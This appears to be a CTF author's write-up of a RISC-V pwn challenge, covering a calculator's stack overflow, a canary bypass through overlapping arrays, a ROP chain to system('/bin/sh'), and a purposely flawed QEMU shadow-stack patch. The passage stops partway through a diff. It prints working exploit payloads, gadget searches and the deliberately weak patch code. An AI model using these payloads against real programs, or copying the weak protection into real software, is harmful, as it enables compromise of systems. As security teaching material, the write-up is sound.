ECW 2023: The Calculator in Shadow (write-up)
This year again, Thalium took part in organizing the European Cyber Week CTF qualifiers, as well as designing several challenges in our core competencies.
For this occasion, I came up with a hard pwn challenge titled The Calculator in Shadow.
It focused on the low-level exploitation of a RISC-V program using a stack overflow vulnerability, but with a twist: the program was run on top of a customized QEMU user-mode emulator, which added a poorly implemented shadow stack protection.
Only 5 participants managed to solve it. In this write-up I will describe the challenge from my point of view as the author.
Introduction
The challenge’s description was the following:
The players were also given:
- the QEMU patch;
- the calculator source code;
- a tiny Binutils patch to be able to compile the new instructions;
- a RISC-V sysroot;
- a docker with all build and debug tools already setup.
You can retrieve all these files here.
Now for the solution, the players were expected to:
- Understand that the QEMU patch is implementing a shadow stack, since they weren’t explicitly aware of it, despite the small hint in the title and introduction.
- Find a buffer overflow vulnerability in the calculator and exploit it.
- Bypass the shadow stack.
- Enjoy flagging.
If you’re not familiar with RISC-V, you can get a quick glance of it through this RISC-V card.
The calculator’s vulnerability
A Makefile was made available with the calculator’s source. In particular, one could use the command make sunbath
to recompile everything without the shadow stack custom instructions.
The calculator was a small program that I implemented with this architecture:
main.c
asks for an input amounting to a maximum of 127 bytes.- The input then undergoes lexical and syntactic analysis through flex and bison, resulting in an AST. The tokens were described in the file
ast.l
and the grammar inast.y
. - At this point it is possible to dump the AST for debugging purposes if the calculator was launched with the
-d
option. The logic for this lies indebug.c
. - The functions in
calc.c
handle traveling throughout the AST and computing the calculation along the way. - Finally, the result is printed, and the program terminates.
The AST is composed of two types of nodes:
- Number nodes which are the leaf nodes of the tree. During the parsing, these nodes are given a
value
. - Binary operations node which have 2 children. The supported operations are the arithmetic addition, subtraction, multiplication, division, and the power function. During the parsing, these nodes are given an
id
in the order they are created. Due to this process, a node with precedence over another will have a lowerid
.
This organization is illustrated by this simple AST:
$ calculator -d
>> 1*(2+3)
| kind = NODE_TIMES
| id = 1
|
| left:
|
| | kind = NODE_NUMBER
| | value = 1
|
| right:
|
| | kind = NODE_PLUS
| | id = 0
| |
| | left:
| |
| | | kind = NODE_NUMBER
| | | value = 2
| |
| | right:
| |
| | | kind = NODE_NUMBER
| | | value = 3
| |
|
Result: 5
The stack overflow vulnerability is present during the calculation process so let’s take a closer look to the core of the calculation phase:
// in file calc.c
error_kind calc (node_t* node_root, int64_t* result) {
IN_SHADOW
int64_t results[MAX_OPS];
bool completed[MAX_OPS];
memzero(results, sizeof(int64_t) * MAX_OPS);
memzero(completed, sizeof(bool) * MAX_OPS);
if (node_root->kind == NODE_NUMBER) {
*result = node_root->content.value;
return ERROR_NO_ERROR;
}
error_kind err = dispatch(node_root, results, completed);
if (err != ERROR_NO_ERROR) {
return err;
}
*result = results[node_root->content.binop.id];
return ERROR_NO_ERROR;
}
Here the dispatch
function will scan the AST recursively, starting from the root node, with a depth-first approach. Each binary operation node encountered along the way will have its result stored in the results
array indexed by the node’s id
. The result will then be used to compute upper nodes. To keep tracks of the already computed nodes the completed
array is used.
Since MAX_OPS
is a constant fixed to 16 we can overflow the arrays by performing a calculation that holds more than 16 operations.
However, it is not so easy to do so, since the secure_calc
function that is responsible for calling calc
performs a few checks beforehand:
error_kind secure_calc (char input[], node_t* node_root, int64_t* result) {
IN_SHADOW
if (MAX_OPS < count_ops(input)) {
return ERROR_OPS_LIMIT;
}
return calc(node_root, result);
}
uint8_t count_ops (char input[]) {
IN_SHADOW
uint8_t count = 0;
uint8_t i = 0;
char c;
do {
c = input[i++];
if (c == '+' || c == '-' || c == '/') {
count++;
} else if (c == '*') {
count++;
if (input[i] == '*') {
i++;
}
}
} while (c != '\0');
return count;
}
We succeed if we can make count_ops
return a wrong result. A way could be to overflow the count
variable which is only an uint8_t
. However, in our case this approach is a bit of a bait since the input collected by main
cannot exceed 127 bytes.
The real flaw of this function lies in the way it counts the operations: parentheses are not considered. Yet, implicit multiplication, in the form (a)(b)
is allowed by the grammar in ast.y
:
purefactor : LPARENTHESIS expression RPARENTHESIS { $$ = $2; }
| LPARENTHESIS expression RPARENTHESIS purefactor { $$ = node_new(NODE_TIMES, $2, $4); }
;
To test the vulnerability let’s write 17 (1)
together to form 16 (1)(1)
implicit multiplications:
>> (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)
*** stack smashing detected ***: terminated
Aborted (core dumped)
We overflow the results
array by a single int64_t
: this directly overwrites the stack canary.
Actually, the vulnerability could be hinted at due to rather contrived patterns of code in the calculator:
- results could have been stored directly in the AST instead of an array;
count_ops
could have scanned the AST to count directly the nodes;count_ops
is not even necessary if we use the counting done during the AST building process.
Bypassing the canary
Since we’re using QEMU user-mode emulation, ASLR is disabled. Other standard binary protections have also been kept low:
Arch: riscv64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x10000)
Since NX is enabled, we want to use ROP, and the stack canary is the main barrier preventing us from doing so.
Or goal is to overwrite the return address of calc
without modifying the canary. The stack frame of this function is organized in the following manner:
Here is what the stack looks like in more details for a legitimate calculation (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)
which fills the result array with ones, towards the end of the function before it returns so that both the results
and completed
array are filled:
The key idea to bypassing the canary is to notice that since the completed
and results
are placed next to each over, the completed
array overflows into the results
the same way the latter overflows into the canary.
The computation for node 0, written at the beginning of the results
array, will overlap with the values 16 to 23 of the completed
array.
Therefore, we can craft a payload like the following:
(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+1311768465173141112)
Where:
(0+1-1)
is the first calculation being made.0+1
yields the result0x0000000000000001
, putting0x01
incompleted[16]
to avoid overwriting the stack canary inresults[16]
. The remaining of thecompleted
array is then filled with zeros.0*0*0
is used for skipping the canary and obtainingresults[17] = results[16] * 0
, thus ensuring the value inresults[17]
is zero even if we do not knowresults[16]
.1311768465173141112
corresponds to0x1234567812345678
, thanks to the precedingresults[18] = results[17] + 0x1234567812345678 = 0 + 0x1234567812345678
.
Here is what the stack looks like with the new payload and the overlapping arrays:
We can verify the bypass succeeded with a debugger:
Program received signal SIGSEGV, Segmentation fault.
0x1234567812345678 in ?? ()
One of the subtleties to consider here was to ensure that completed[16]
is overwritten before it is read. The event order is indeed not that trivial and is determined by the dispatch
function:
error_kind dispatch (node_t* node, int64_t results[], bool completed[]) {
IN_SHADOW
error_kind err;
if (get_completion(node, completed)) {
return ERROR_NO_ERROR;
}
node_t *node_l = node->content.binop.node_l;
if (!get_completion(node_l, completed)) {
err = dispatch(node_l, results, completed);
if (err != ERROR_NO_ERROR) {
return err;
}
}
node_t *node_r = node->content.binop.node_r;
if (!get_completion(node_r, completed)) {
err = dispatch(node_r, results, completed);
if (err != ERROR_NO_ERROR) {
return err;
}
}
// [...] The node calculation is handled here
}
This function follows this scheme:
- The value in
completed
for the parent node is verified. If it is not zero, both the node and its children will not be computed. - The value in
completed
for the left child node is verified, then the node is computed accordingly. - The value in
completed
for the right child node is verified, then the node is computed accordingly. - The parent node is computed.
We want results[0]
(and therefore completed[16]
) to be computed before the check for completed[16]
is done. Referring to the scheme we just detailed, it is possible to achieve this if there is an ancestor for which node 0 is in the left child descendants, and for which node 16 is in the right child descendants.
We can verify that the submitted calculation had the desired behavior by dumping the AST.
calculator -d
>>> (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+1311768465173141112)
| kind = NODE_PLUS
| id = 19
|
| left:
|
| | kind = NODE_TIMES
| | id = 15
| |
| | left:
| |
| | | kind = NODE_NUMBER
| | | value = 1
| |
| | right:
| |
| | | kind = NODE_TIMES
| | | id = 14
| | |
| | | left:
| | |
| | | | kind = NODE_NUMBER
| | | | value = 1
| | |
| | | right:
| | |
| | | | kind = NODE_TIMES
| | | | id = 13
| | | |
[...] The pattern repeats
| | | | | | | | | | | | | |
| | | | | | | | | | | | | | right:
| | | | | | | | | | | | | |
| | | | | | | | | | | | | | | kind = NODE_TIMES
| | | | | | | | | | | | | | | id = 2
| | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | left:
| | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | kind = NODE_NUMBER
| | | | | | | | | | | | | | | | value = 1
| | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | right:
| | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | kind = NODE_MINUS
| | | | | | | | | | | | | | | | id = 1
| | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | left:
| | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | kind = NODE_PLUS
| | | | | | | | | | | | | | | | | id = 0
| | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | left:
| | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | | kind = NODE_NUMBER
| | | | | | | | | | | | | | | | | | value = 0
| | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | right:
| | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | | kind = NODE_NUMBER
| | | | | | | | | | | | | | | | | | value = 1
| | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | right:
| | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | kind = NODE_NUMBER
| | | | | | | | | | | | | | | | | value = 1
| | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | |
| | | | | | | | | | | | | |
| | | | | | | | | | | | |
| | | | | | | | | | | |
| | | | | | | | | | |
| | | | | | | | | |
| | | | | | | | |
| | | | | | | |
| | | | | | |
| | | | | |
| | | | |
| | | |
| | |
| |
|
| right:
|
| | kind = NODE_PLUS
| | id = 18
| |
| | left:
| |
| | | kind = NODE_TIMES
| | | id = 17
| | |
| | | left:
| | |
| | | | kind = NODE_TIMES
| | | | id = 16
| | | |
| | | | left:
| | | |
| | | | | kind = NODE_NUMBER
| | | | | value = 0
| | | |
| | | | right:
| | | |
| | | | | kind = NODE_NUMBER
| | | | | value = 0
| | | |
| | |
| | | right:
| | |
| | | | kind = NODE_NUMBER
| | | | value = 0
| | |
| |
| | right:
| |
| | | kind = NODE_NUMBER
| | | value = 1311768465173141112
| |
|
In this AST:
- node 0 is a descendant of node 15, the left child of node 19 (also the root node);
- node 16 is a descendant of node 18, the right child of node 19;
- node 16 has no descendants: since node 16 is not computed its descendants will neither so it is easier if it doesn’t have any.
Again, a hint to this bug was that the code pattern used here is still a bit contrived. A completed
array is not really useful if we can travel the tree while visiting each node once and only once. Moreover, the implementation here was already doing this!
It’s ROP time
Since the beginning of the year, ROPGadget has added support for RISCV-64, so we can make use of it.
A simple search on the challenge’s libc
yields loads of results:
$ ROPgadget --binary build/sysroot/lib/libc.so.6
Unique gadgets found: 286370
Removing system and JOP gadgets outputs a more reasonable amount:
$ ROPgadget --nosys --nojop --binary build/sysroot/lib/libc.so.6
Unique gadgets found: 5360
RISC-V leaf functions don’t usually push and pop the ra
register from the stack, but rather leave it intact. To avoid such functions, we can restrict our search to gadgets that actually do something with the register (hopefully popping it from the stack):
$ ROPgadget --nosys --nojop --re "ra.+" --binary build/sysroot/lib/libc.so.6
Unique gadgets found: 584
Analyzing the results shows that a lot of the libc
gadgets use condensed instructions: such instructions are 16-byte RISC-V instruction for common operations, as opposed to the classic 32-byte RISC-V instructions. Their purpose is to reduce code size.
In particular, here we can look for the c.ldsp
instruction which expands to a stack pointer-relative ld
instruction, that is to say a load operation from the stack.
A search focusing on loading the ra
and a0
(first argument) registers yields:
$ ROPgadget --nosys --nojop --binary build/sysroot/lib/libc.so.6 | grep "c.ldsp ra" | grep "c.ldsp a0"
0x000000000005d5f2 : c.addi ra, 0x1d ; c.ldsp a0, 8(sp) ; c.ldsp ra, 0x18(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x00000000000b4544 : c.addi4spn s0, sp, 0x358 ; c.ldsp ra, 0x28(sp) ; c.ldsp a0, 0x18(sp) ; c.addi16sp sp, 0x30 ; c.jr ra
0x000000000003b2fe : c.addi4spn s0, sp, 0x44 ; c.ldsp ra, 0x18(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x000000000003b42e : c.ld s0, 0x48(a2) ; c.ldsp ra, 0x18(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x000000000003908a : c.ldsp a0, 0x98(sp) ; c.ldsp ra, 0x138(sp) ; c.addi16sp sp, 0x140 ; c.jr ra
0x000000000005d5f4 : c.ldsp a0, 8(sp) ; c.ldsp ra, 0x18(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x000000000003b300 : c.ldsp ra, 0x18(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x00000000000e66bc : c.ldsp ra, 0x18(sp) ; c.ldsp s0, 0x10(sp) ; c.ldsp a0, 8(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
0x00000000000b4546 : c.ldsp ra, 0x28(sp) ; c.ldsp a0, 0x18(sp) ; c.addi16sp sp, 0x30 ; c.jr ra
0x0000000000039088 : c.nop ; c.ldsp a0, 0x98(sp) ; c.ldsp ra, 0x138(sp) ; c.addi16sp sp, 0x140 ; c.jr ra
Let’s use this gadget: 0x000000000005d5f4 : c.ldsp a0, 8(sp) ; c.ldsp ra, 0x18(sp) ; c.addi16sp sp, 0x20 ; c.jr ra
.
Our target ra
will be the address of the system
function. We find that it is located at offset 0x45688
relative to the libc
base:
$ nm -gD riscv/sysroot/lib/libc.so.6 | grep system
0000000000045688 T __libc_system@@GLIBC_PRIVATE
00000000000e14e8 T svcerr_systemerr@GLIBC_2.27
0000000000045688 W system@@GLIBC_2.27
Our target a0
will be the /bin/sh
string. We find that it is located at offset 0x1086c8
relative to the libc
base:
$ ROPgadget --string "/bin/sh" --binary build/sysroot/lib/libc.so.6
Strings information
============================================================
0x00000000001086c8 : /bin/sh
Now since the address space is fixed for this binary let’s use a debugger to dump it:
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
Start End Perm Size Offset File
0x10000 0x16000 r-xp 6000 0 /home/challenger/calculator/build/bin/calculator
0x16000 0x17000 rw-p 1000 6000 /home/challenger/calculator/build/bin/calculator
0x40007ff000 0x4000820000 rw-p 21000 0 [stack]
0x4000801000 0x400081d000 r-xp 1c000 0 [linker]
0x4000801000 0x400081d000 r-xp 1c000 0 /home/challenger/riscv/sysroot/lib/ld-linux-riscv64-lp64d.so.1
0x400081d000 0x400081f000 rw-p 2000 1c000 [linker]
0x400081d000 0x400081f000 rw-p 2000 1c000 /home/challenger/riscv/sysroot/lib/ld-linux-riscv64-lp64d.so.1
0x4000824000 0x4000955000 rw-p 131000 0 <explored>
Here the libc
mapping starts at 0x4000824000
and corresponds to the last line. However, it is not really obvious due to limitations of QEMU’s gdb stub. We can confirm the address by looking directly at the mappings in /proc/maps
:
$ pgrep qemu
715
$ cat /proc/715/maps | grep libc
4000824000-4000941000 r--p 00000000 fe:02 10511477 /home/challenger/riscv/sysroot/lib/libc.so.6
4000941000-4000944000 r--p 0011d000 fe:02 10511477 /home/challenger/riscv/sysroot/lib/libc.so.6
4000944000-4000946000 rw-p 00120000 fe:02 10511477 /home/challenger/riscv/sysroot/lib/libc.so.6
7f9a67e38000-7f9a67e60000 r--p 00000000 fe:02 10009775 /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a67e60000-7f9a67ff5000 r-xp 00028000 fe:02 10009775 /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a67ff5000-7f9a6804d000 r--p 001bd000 fe:02 10009775 /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a6804d000-7f9a68051000 r--p 00214000 fe:02 10009775 /usr/lib/x86_64-linux-gnu/libc.so.6
7f9a68051000-7f9a68053000 rw-p 00218000 fe:02 10009775 /usr/lib/x86_64-linux-gnu/libc.so.6
There are 2 libc
mappings: the x86 one for QEMU and the RISC-V one for the emulated program.
We can use the computation to fill the stack with the values that then will be popped by the gadget. Since these values are the results of operations, we need to compute each value relatively to the preceding one:
Name | Offset in libc | Absolute address | Hex => Int | Relative to precedent |
---|---|---|---|---|
Gadget | 0x5d5f4 | 0x40008815f4 | 274886825460 | +274886825460 |
/bin/sh | 0x1086c8 | 0x400092c6c8 | 274887526088 | +700628 |
system() | 0x45688 | 0x4000869688 | 274886727304 | -798784 |
Putting all these together we can finally get a shell with:
(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+274886825460+0+700628+0-798784)
The shady QEMU patch
The challenge is not yet finished!
Up until now we were working on the calculator without the custom instructions implemented by the provided QEMU patch. If we use the original calculator with our previous payload, we don’t get a shell, but a shadow exception:
================================================
Shadow exception triggered!
(Conveniently handled as an illegal instruction)
The current dark page is 0x0000004000955000
The current dark offset is 0x8
================================================
Illegal instruction (core dumped)
This exception comes from the shadow stack mechanism that was added by the patch.
In brief: a special stack is created only to store return addresses. During return instructions, the address stored in the register (often popped from the classic stack prior to that) is compared with the one on the shadow stack to ensure it was not tampered with.
The challengers didn’t initially know the patch was implementing a shadow stack and had to figure it out. As for this write-up, I will instead give a quick tour of the code.
diff --git a/target/riscv/cpu.c b/target/riscv/cpu.c
index 1e97473af2..fef657cc88 100644
--- a/target/riscv/cpu.c
+++ b/target/riscv/cpu.c
@@ -131,6 +131,7 @@ static const struct isa_ext_data isa_edata_arr[] = {
ISA_EXT_DATA_ENTRY(xtheadmempair, true, PRIV_VERSION_1_11_0, ext_xtheadmempair),
ISA_EXT_DATA_ENTRY(xtheadsync, true, PRIV_VERSION_1_11_0, ext_xtheadsync),
ISA_EXT_DATA_ENTRY(xventanacondops, true, PRIV_VERSION_1_12_0, ext_XVentanaCondOps),
+ ISA_EXT_DATA_ENTRY(xishadow, true, PRIV_VERSION_1_12_0, ext_xishadow),
};
static bool isa_ext_is_enabled(RISCVCPU *cpu,
@@ -1528,6 +1529,9 @@ static Property riscv_cpu_properties[] = {
* it with -x and default to 'false'.
*/
DEFINE_PROP_BOOL("x-misa-w", RISCVCPU, cfg.misa_w, false),
+
+ DEFINE_PROP_BOOL("xishadow", RISCVCPU, cfg.ext_xishadow, true),
+
DEFINE_PROP_END_OF_LIST(),
};
These lines are used to define a new RISC-V extension.
As per RISC-V extensions naming convention (See RISC-V Unprivileged Specification, chapter 29), the extension’s name starts with an x
, indicating a non-standard user-level extension. I then added an i
to highlight that the added instructions are close to the ones in the base integer instruction set, but the spec doesn’t actually require this.
diff --git a/target/riscv/cpu.h b/target/riscv/cpu.h
index 638e47c75a..cbdba0bc64 100644
--- a/target/riscv/cpu.h
+++ b/target/riscv/cpu.h
@@ -383,6 +383,9 @@ struct CPUArchState {
uint64_t kvm_timer_compare;
uint64_t kvm_timer_state;
uint64_t kvm_timer_frequency;
+
+ target_ulong dark_page;
+ uint16_t dark_offset;
};
diff --git a/target/riscv/cpu_bits.h b/target/riscv/cpu_bits.h
index fca7ef0cef..f930db99e4 100644
--- a/target/riscv/cpu_bits.h
+++ b/target/riscv/cpu_bits.h
@@ -523,6 +523,10 @@
/* Crypto Extension */
#define CSR_SEED 0x015
+/* Shadow Extension */
+#define CSR_DARKPAGE 0x01a
+#define CSR_DARKOFF 0x01b
+
/* mstatus CSR bits */
#define MSTATUS_UIE 0x00000001
#define MSTATUS_SIE 0x00000002
@@ -677,6 +681,7 @@ typedef enum RISCVException {
RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT = 0x15,
RISCV_EXCP_VIRT_INSTRUCTION_FAULT = 0x16,
RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT = 0x17,
+ RISCV_EXCP_SHADOW = 0x18,
} RISCVException;
#define RISCV_EXCP_INT_FLAG 0x80000000
The CPUArchState
is then modified to add 2 CSRs (Control and Status Register, see RISC-V Unprivileged Specification, chapter 11, and RISC-V Privileged Specification, chapter 2):
dark_page
: it stores the base address of the shadow stack;dark_offset
: it stores the current offset in the shadow stack. It is stored as anuint16_t
only.
We also define the CPU bits for these registers and a new exception.
diff --git a/target/riscv/csr.c b/target/riscv/csr.c
index 736ab64275..b81420f0e3 100644
--- a/target/riscv/csr.c
+++ b/target/riscv/csr.c
@@ -550,6 +550,14 @@ static RISCVException seed(CPURISCVState *env, int csrno)
#endif
}
+static RISCVException shadow(CPURISCVState *env, int csrno)
+{
+ if (!riscv_cpu_cfg(env)->ext_xishadow) {
+ return RISCV_EXCP_ILLEGAL_INST;
+ }
+ return RISCV_EXCP_NONE;
+}
+
/* User Floating-Point CSRs */
static RISCVException read_fflags(CPURISCVState *env, int csrno,
target_ulong *val)
@@ -3995,6 +4003,36 @@ RISCVException riscv_csrrw_debug(CPURISCVState *env, int csrno,
return ret;
}
+/* Shadow */
+
+static RISCVException read_dark_page(CPURISCVState *env, int csrno,
+ target_ulong *val)
+{
+ *val = env->dark_page;
+ return RISCV_EXCP_NONE;
+}
+
+static RISCVException write_dark_page(CPURISCVState *env, int csrno,
+ target_ulong val)
+{
+ env->dark_page = val;
+ return RISCV_EXCP_NONE;
+}
+
+static RISCVException read_dark_offset(CPURISCVState *env, int csrno,
+ target_ulong *val)
+{
+ *val = (target_ulong) env->dark_offset;
+ return RISCV_EXCP_NONE;
+}
+
+static RISCVException write_dark_offset(CPURISCVState *env, int csrno,
+ target_ulong val)
+{
+ env->dark_offset = (uint16_t)(val & 0xFFFF);
+ return RISCV_EXCP_NONE;
+}
+
/*
* Control and Status Register function table
* riscv_csr_operations::predicate() must be provided for an implemented CSR
@@ -4028,6 +4066,10 @@ riscv_csr_operations csr_ops[CSR_TABLE_SIZE] = {
/* Crypto Extension */
[CSR_SEED] = { "seed", seed, NULL, NULL, rmw_seed },
+ /* Shadow Extension */
+ [CSR_DARKPAGE] = {"vdarkpage", shadow, read_dark_page, write_dark_page},
+ [CSR_DARKOFF] = {"vdarkoff", shadow, read_dark_offset, write_dark_offset},
+
#if !defined(CONFIG_USER_ONLY)
/* Machine Timers and Counters */
[CSR_MCYCLE] = { "mcycle", any, read_hpmcounter,
Here we define the shadow
function that checks if the extension is enabled, and getters and setters for the registers we just added.
The line env->dark_offset = (uint16_t)(val & 0xFFFF);
highlights how unnatural it was to choose an uint16_t
for the dark_offset
register. The ability to perform on integer overflow on the dark_offset
is indeed the main weakness of this shadow stack.
diff --git a/target/riscv/insn32.decode b/target/riscv/insn32.decode
index 73d5d1b045..1a6c9d881e 100644
--- a/target/riscv/insn32.decode
+++ b/target/riscv/insn32.decode
@@ -908,3 +908,8 @@ sm4ks .. 11010 ..... ..... 000 ..... 0110011 @k_aes
# *** RV32 Zicond Standard Extension ***
czero_eqz 0000111 ..... ..... 101 ..... 0110011 @r
czero_nez 0000111 ..... ..... 111 ..... 0110011 @r
+
+# *** Shadow Extension ***
+@shadow ....... ..... ..... ... ..... ....... %rs1
+dusk 0000000 00000 ..... 000 00000 0001011 @shadow
+obscure 0000000 00000 ..... 001 00000 0001011 @shadow
This file defines the instructions decoding through QEMU decodetree. We can read the patterns of the added I-type instructions as:
Name | Immediate | Immediate | rs1 | funct3 | rd | opcode |
---|---|---|---|---|---|---|
Bits position | 31 - 25 | 24 - 20 | 19 - 15 | 14 - 12 | 11 - 7 | 6 - 0 |
dusk | 0000000 | 00000 | any | 000 | 00000 | 0001011 |
obscure | 0000000 | 00000 | any | 001 | 00000 | 0001011 |
2 new instructions are added: dusk
and obscure
. They don’t use the destination register (rd
) nor the immediate, hence we require them filled with zeros. Only the 1st source register (rs1
) is collected.
For our two instructions we use the major opcode 0001011
which is left empty as custom-0
(see RISC-V Unprivileged Specification, table 27.1 and chapter 28), then we differentiate them using the minor opcode in funct3
.
diff --git a/target/riscv/insn_trans/trans_shadow.c.inc b/target/riscv/insn_trans/trans_shadow.c.inc
new file mode 100644
index 0000000000..8d98f413bb
--- /dev/null
+++ b/target/riscv/insn_trans/trans_shadow.c.inc
@@ -0,0 +1,27 @@
+static bool trans_dusk(DisasContext *ctx, arg_dusk *a)
+{
+ TCGv_i32 csr_darkpage = tcg_constant_i32(CSR_DARKPAGE);
+ gen_helper_csrw(cpu_env, csr_darkpage, get_gpr(ctx, a->rs1, EXT_NONE));
+
+ TCGv_i32 csr_darkoff = tcg_constant_i32(CSR_DARKOFF);
+ TCGv zero = tcg_constant_tl(0);
+ gen_helper_csrw(cpu_env, csr_darkoff, zero);
+
+ return true;
+}
+
+static bool trans_obscure(DisasContext *ctx, arg_obscure *a)
+{
+ TCGv dark_offset = tcg_temp_new();
+ TCGv_i32 csr_darkoff = tcg_constant_i32(CSR_DARKOFF);
+ gen_helper_csrr(dark_offset, cpu_env, csr_darkoff);
+ TCGv darkest_address = get_darkest_address(ctx, dark_offset);
+
+ TCGv saved_data = get_gpr(ctx, a->rs1, EXT_NONE);
+ tcg_gen_qemu_st_tl(saved_data, darkest_address, ctx->mem_idx,
+ MO_ALIGN | MO_TE | size_memop(get_xlen_bytes(ctx)));
+
+ tcg_gen_addi_tl(dark_offset, dark_offset, get_xlen_bytes(ctx));
+ gen_helper_csrw(cpu_env, csr_darkoff, dark_offset);
+ return true;
+}
diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index 0ee8ee147d..26db5b6f1a 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -156,6 +156,12 @@ static inline int __attribute__((unused)) get_xlen(DisasContext *ctx)
return 16 << get_xl(ctx);
}
+/* The word size for this machine mode, in bytes. */
+static inline int __attribute__((unused)) get_xlen_bytes(DisasContext *ctx)
+{
+ return get_xlen(ctx) >> 3;
+}
+
/* The operation length, as opposed to the xlen. */
#ifdef TARGET_RISCV32
#define get_ol(ctx) MXL_RV32
@@ -1069,6 +1075,18 @@ static uint32_t opcode_at(DisasContextBase *dcbase, target_ulong pc)
return cpu_ldl_code(env, pc);
}
+static TCGv get_darkest_address(DisasContext *ctx, TCGv dark_offset)
+{
+ TCGv dark_page = tcg_temp_new();
+ TCGv_i32 csr_darkpage = tcg_constant_i32(CSR_DARKPAGE);
+ gen_helper_csrr(dark_page, cpu_env, csr_darkpage);
+
+ TCGv darkest_address = tcg_temp_new();
+ tcg_gen_add_tl(darkest_address, dark_page, dark_offset);
+
+ return darkest_address;
+}
+
/* Include insn module translation function */
#include "insn_trans/trans_rvi.c.inc"
#include "insn_trans/trans_rvm.c.inc"
@@ -1094,6 +1112,9 @@ static uint32_t opcode_at(DisasContextBase *dcbase, target_ulong pc)
/* Include decoders for factored-out extensions */
#include "decode-XVentanaCondOps.c.inc"
+/* Include Shadow extension */
+#include "insn_trans/trans_shadow.c.inc"
+
/* The specification allows for longer insns, but not supported by qemu. */
#define MAX_INSN_LEN 4
In these files lies the logic for the new instructions. They rely on TCG (Tiny Code Generator), the intermediate language QEMU uses for emulation. What is modified here is part of the TCG front-end for RISC-V, meaning they define how to translate guest RISC-V instructions to TCG operations.
In a next stage, TCG operations are optimized and finally translated to the host instruction set using the corresponding TCG backend. We do not alter this part of QEMU in the challenge.
The first instruction, dusk
, is rather short. It relies on gen_helper_csrw
, which is a helper function handling the generation of the necessary TCG operations for a CSR write.
Here is the operation translated into pseudo-code, with the GPRs (General Purpose Register) and CPRs seen as lists:
// dusk rs1
CSR[dark_page] = GPR[rs1]; // gen_helper_csrw (CSR write)
CSR[dark_offset] = 0; // gen_helper_csrw
The instruction initializes the shadow stack, taking the base address from the content of the register rs1
. The offset is set to 0
, “pointing” to the first cell of the stack, currently empty.
In the calculator, this instruction is accordingly called only once, in the function blue_hour
at the start of main
:
void blue_hour (void) {
#ifndef SUNBATH
void *page = mmap(NULL, 64 * 1024, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
if (page == MAP_FAILED) {
error(ERROR_DUSK_MMAP);
}
asm volatile(
"dusk %0"
:
: "r" (page)
);
#endif
}
The function only does a mmap
then forwards the returned address to the dusk
instruction. In this shadow stack implementation, the memory region hosting the shadow stack is thus allocated directly by the protected program.
The second instruction, obscure
, relies on 2 custom helper functions:
xlen_bytes()
, which returns the address size for the current architecture, in bytes (In RISCV-64 it is 8).get_darkest_address()
, which computesdarkest_address
as the sum ofdark_page
anddark_offset
. It can be seen as the shadow stack pointer.
Here is the pseudo-code for get_darkest_address()
:
// get_darkest_address()
TCG[dark_page] = CSR[dark_page] // gen_helper_csrr (CSR read)
TCG[darkest_address] = TCG[dark_page] + TCG[dark_offset] // tcg_gen_add_tl (addition)
And there for obscure
:
// obscure rs1
TCG[dark_offset] = CSR[dark_offset]; // gen_helper_csrr
TCG[darkest_address] = get_darkest_address();
*TCG[darkest_address] = GPR[rs1]; // tcg_gen_qemu_st_tl (store)
TCG[dark_offset] = TCG[dark_offset] + xlen_bytes(); // tcg_gen_addi_tl (add immediate)
CSR[dark_offset] = TCG[dark_offset]; // gen_helper_csrw
The instruction realizes a push to the shadow stack. It retrieves the shadow stack pointer and stores the address passed through rs1
in the pointed shadow stack cell. The dark_offset
is then incremented so that it always indicates the first empty cell.
In the calculator, it is used at the beginning of every function from calc.c
, with the IN_SHADOW
macro:
#ifndef SUNBATH
#define IN_SHADOW \
asm volatile( \
"obscure ra" \
);
#else
#define IN_SHADOW
#endif
diff --git a/target/riscv/insn_trans/trans_rvi.c.inc b/target/riscv/insn_trans/trans_rvi.c.inc
index 4ad54e8a49..31062b27c3 100644
--- a/target/riscv/insn_trans/trans_rvi.c.inc
+++ b/target/riscv/insn_trans/trans_rvi.c.inc
@@ -65,6 +65,30 @@ static bool trans_jalr(DisasContext *ctx, arg_jalr *a)
}
gen_set_gpri(ctx, a->rd, ctx->pc_succ_insn);
+
+ if (a->rd == 0 && a->rs1 == xRA && a->imm == 0) {
